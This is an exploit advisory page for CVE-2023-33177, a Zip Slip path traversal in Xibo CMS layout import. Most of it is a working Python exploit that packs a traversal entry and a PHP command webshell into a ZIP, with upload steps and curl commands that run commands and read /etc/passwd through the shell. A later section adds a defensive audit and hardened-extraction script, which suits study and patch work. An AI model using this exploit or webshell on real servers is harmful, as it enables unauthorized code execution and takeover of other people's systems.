XiboCMS 3.3.4 Traversal / Code Execution

Published: 10 Apr 2026 00:00:00
Reported by: complexusprada
Type: packetstorm
Source: packetstorm.news
Views: 85

An authenticated user with layout-import permission can abuse a Zip Slip path traversal in Xibo CMS 3.3.4 (and earlier affected releases) to write a PHP webshell into the web root and gain remote code execution.

Related

Reporter        Title                                                                          Published
GithubExploit   Exploit for Path Traversal in Xibosignage Xibo                                 9 Apr 2026 17:10
Circl           CVE-2023-33177                                                                 17 Nov 2025 15:00
CNNVD           Xibo path traversal vulnerability                                              30 May 2023 00:00
CVE             CVE-2023-33177                                                                 30 May 2023 19:12
Cvelist         CVE-2023-33177 Xibo CMS vulnerable to Remote Code Execution through Zip Slip   30 May 2023 19:12
Exploit DB      xibocms 3.3.4 - RCE                                                            8 Apr 2026 00:00
EUVD            EUVD-2023-37360                                                                3 Oct 2025 20:07
NVD             CVE-2023-33177                                                                 30 May 2023 20:15
OSV             CVE-2023-33177 Xibo CMS vulnerable to Remote Code Execution through Zip Slip   30 May 2023 19:12
Prion           Path traversal                                                                 30 May 2023 20:15
# Exploit Title: XiboCMS 3.3.4 - Remote Code Execution
# Google Dork: N/A
# Date: 2025-11-18
# Exploit Author: complexusprada
# Vendor Homepage: https://xibo.org.uk/
# Software Link: https://github.com/xibosignage/xibo-cms
# Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4
# Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4
# CVE: CVE-2023-33177
# GHSA: GHSA-jj27-x85q-crqv
# Category: webapps

"""
# Vulnerability Description:
# Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import
# functionality. The application fails to validate the file paths listed in the
# mapping.json file inside an uploaded ZIP archive, so an authenticated attacker can
# write files outside the intended library directory using traversal sequences (../../).
# This results in arbitrary file write and remote code execution.

# Exploitation Details:
# 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure
# 2. The mapping.json file contains a path traversal payload (../../web/shell.php)
# 3. A PHP webshell is placed at the corresponding path within the ZIP structure
# 4. When the layout is imported, Xibo extracts the file without validating the path
# 5. The webshell is written to the web root (/var/www/cms/web/shell.php)
# 6. Attacker gains remote code execution via the webshell

# Vulnerability Chain:
# ZIP contains:  library/../../web/shell.php
# mapping.json:  {"file": "../../web/shell.php", ...}
# Xibo reads:    library/ + ../../web/shell.php            (entry name inside the ZIP)
# Xibo writes:   /var/www/cms/library/temp/ + ../../web/shell.php
# Result:        /var/www/cms/web/shell.php (webshell in web root!)

# Prerequisites:
# - Valid Xibo CMS credentials (any authenticated user with layout import permission)
# - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4
# - The paths above assume the Docker default layout (CMS in /var/www/cms, library in
#   /var/www/cms/library); adjust the traversal depth if the library is elsewhere

# Exploitation Steps:
# 1. Run this script to generate exploit.zip
# 2. Log in to Xibo CMS
# 3. Navigate to: Design → Layouts → Import
# 4. Upload the generated exploit.zip file
# 5. Even if JSON errors are shown afterwards, the webshell has already been written to disk
# 6. Access the webshell at: http://<target>/shell.php?cmd=<command>
# Example: curl 'http://target/shell.php?cmd=id'

# Mitigation:
# Upgrade to a patched version:
# - Xibo CMS 2.3.17+ (for the 2.x branch)
# - Xibo CMS 3.3.5+ (for the 3.x branch)

# Disclaimer:
# This exploit is provided for educational purposes, authorized penetration testing,
# and vulnerability research only. Only use it against systems you own or have explicit
# written permission to test.
"""

import json
import sys
import zipfile


def create_exploit():
    """Generate the malicious ZIP file for the Xibo CMS layout-import Zip Slip."""

    print("[*] Xibo CMS Zip Slip RCE Exploit Generator")
    print("[*] CVE-2023-33177 - Path Traversal via Layout Import")
    print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4\n")

    # Minimal Xibo 3.x layout structure so the archive passes the initial
    # validation steps and reaches the file-extraction code path
    layout_json = {
        "layout": "Exploit Layout",
        "description": "Path Traversal Test",
        "layoutDefinitions": {
            "schemaVersion": 3,
            "width": 1920,
            "height": 1080,
            "backgroundColor": "#000000",
            "backgroundzIndex": 0,
            "code": "CVE-2023-33177",
            "actions": [],
            "regions": [],
            "drawers": []
        }
    }

    # Empty playlist - triggers the JSON import code path
    playlist_json = {}

    # VULNERABILITY: path traversal via the 'file' field in mapping.json.
    # The value is not sanitized before extraction; Xibo builds the destination as
    # library/temp/ + file['file'], so ../../ escapes the library directory.
    mapping_json = [{
        "file": "../../web/shell.php",  # Path traversal payload
        "name": "shell.php",
        "type": "module"
    }]

    # Simple PHP webshell; runs the command passed in the GET parameter ?cmd=<command>
    webshell = b'<?php system($_GET["cmd"]); ?>'

    # Create the malicious ZIP file
    try:
        with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
            # Required Xibo layout files
            zf.writestr('layout.json', json.dumps(layout_json, indent=2))
            zf.writestr('playlist.json', json.dumps(playlist_json))
            zf.writestr('mapping.json', json.dumps(mapping_json))

            # CRITICAL: the entry name must match what Xibo asks the archive for.
            # Xibo calls $zip->getStream('library/' . $file['file']), so the
            # webshell is stored under the literal name library/../../web/shell.php
            zf.writestr('library/../../web/shell.php', webshell)

        print("[+] Exploit ZIP created successfully: exploit.zip")
        print("\n[*] Exploitation Steps:")
        print("    1. Log in to Xibo CMS with valid credentials")
        print("    2. Navigate to: Design → Layouts → Import")
        print("    3. Upload exploit.zip")
        print("    4. Ignore any JSON errors (the file has already been written)")
        print("    5. Access the webshell: http://<target>/shell.php?cmd=<command>")
        print("\n[*] Example:")
        print("    curl 'http://target/shell.php?cmd=id'")
        print("    curl 'http://target/shell.php?cmd=cat%20/etc/passwd'")
        print()

    except Exception as e:
        print(f"[-] Error creating exploit: {e}", file=sys.stderr)
        sys.exit(1)


if __name__ == "__main__":
    create_exploit()
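The "Vulnerability Chain" and "Mitigation" sections above describe the missing check rather than show it. The following is an added example, written for this page and not taken from Xibo's code or from the exploit, that builds two archives in memory (one shaped like exploit.zip, one benign, both constructed sample data), audits them for the two escape routes the exploit uses (mapping.json 'file' values and raw ZIP entry names), and shows a hardened extraction that canonicalises every destination before writing. It assumes the Docker default library path quoted above and that mapping.json is a list of objects with a 'file' key; the function names are the example's own.

```python
"""Zip Slip audit and hardened extraction for Xibo-style layout archives.

Added example (not Xibo's code, not the exploit's). Assumptions: the importer
joins each mapping.json 'file' value onto <library>/temp/ and reads the entry
'library/' + file from the archive, as described in the exploit header.
"""
from __future__ import annotations

import io
import json
import os
import posixpath
import tempfile
import zipfile

LIBRARY_DIR = "/var/www/cms/library"        # assumed Docker default from the page
TEMP_DIR = posixpath.join(LIBRARY_DIR, "temp")
WEBSHELL = b'<?php system($_GET["cmd"]); ?>'


def build_zip(entries: dict[str, bytes]) -> bytes:
    """Construct an in-memory ZIP from {entry_name: content} (sample data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def exploit_like_zip() -> bytes:
    """Constructed sample with the same shape as exploit.zip above."""
    mapping = [{"file": "../../web/shell.php", "name": "shell.php", "type": "module"}]
    return build_zip({
        "layout.json": b"{}",
        "mapping.json": json.dumps(mapping).encode(),
        "library/../../web/shell.php": WEBSHELL,
    })


def benign_zip() -> bytes:
    """Constructed sample of a well-formed layout export."""
    mapping = [{"file": "1.png", "name": "logo.png", "type": "image"}]
    return build_zip({
        "layout.json": b"{}",
        "mapping.json": json.dumps(mapping).encode(),
        "library/1.png": b"\x89PNG\r\n\x1a\n",
    })


def resolve_inside(base_dir: str, untrusted: str) -> str | None:
    """Join untrusted onto base_dir; return the normalised path only if it
    stays inside base_dir, else None. Pure string logic so the audit runs
    without touching the CMS filesystem (see safe_extract for the on-disk check)."""
    if posixpath.isabs(untrusted):          # '/etc/...' would replace base_dir in join()
        return None
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, untrusted))
    return target if target == base or target.startswith(base + "/") else None


def audit_layout_zip(zip_bytes: bytes, temp_dir: str = TEMP_DIR) -> list[str]:
    """Return findings for a layout ZIP; an empty list means nothing escapes temp_dir."""
    findings: list[str] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
        for name in names:                  # raw entry names (library/../../web/shell.php)
            if resolve_inside(temp_dir, name) is None:
                findings.append(f"zip entry escapes {temp_dir}: {name}")
        if "mapping.json" in names:         # values the importer joins onto temp_dir
            mapping = json.loads(zf.read("mapping.json"))
            for item in mapping if isinstance(mapping, list) else []:
                ref = str(item.get("file", ""))
                if resolve_inside(temp_dir, ref) is None:
                    findings.append(f"mapping.json file escapes {temp_dir}: {ref}")
    return findings


def safe_extract(zip_bytes: bytes, dest_dir: str) -> list[str]:
    """Hardened extraction: realpath() the destination and refuse anything not
    under dest_dir (catches '..' and symlinked parents). Returns skipped names."""
    dest_real = os.path.realpath(dest_dir)
    skipped: list[str] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                skipped.append(info.filename)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
    return skipped


def demo_safe_extract(zip_bytes: bytes) -> tuple[list[str], list[str]]:
    """Extract into a throwaway directory; return (skipped names, written relative paths)."""
    with tempfile.TemporaryDirectory() as d:
        skipped = safe_extract(zip_bytes, d)
        written = sorted(os.path.relpath(os.path.join(root, f), d)
                         for root, _, files in os.walk(d) for f in files)
    return skipped, written


if __name__ == "__main__":
    for label, data in (("exploit-like", exploit_like_zip()), ("benign", benign_zip())):
        print(f"{label}: {audit_layout_zip(data) or ['clean']}")
    print("safe_extract skipped/written:", demo_safe_extract(exploit_like_zip()))
```

The audit flags the exploit archive twice (once for the entry name, once for the mapping.json value) and passes the benign one; safe_extract writes layout.json and mapping.json but drops the traversal entry. Note that the string check treats backslashes as ordinary filename characters, which matches PHP on Linux; an importer running on Windows would also need to normalise '\\'.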

Scores (current as of 10 Apr 2026 00:00)
Vulners AI Score: 7.4 (High risk)
CVSS 3.1: 8.8
EPSS: 0.13271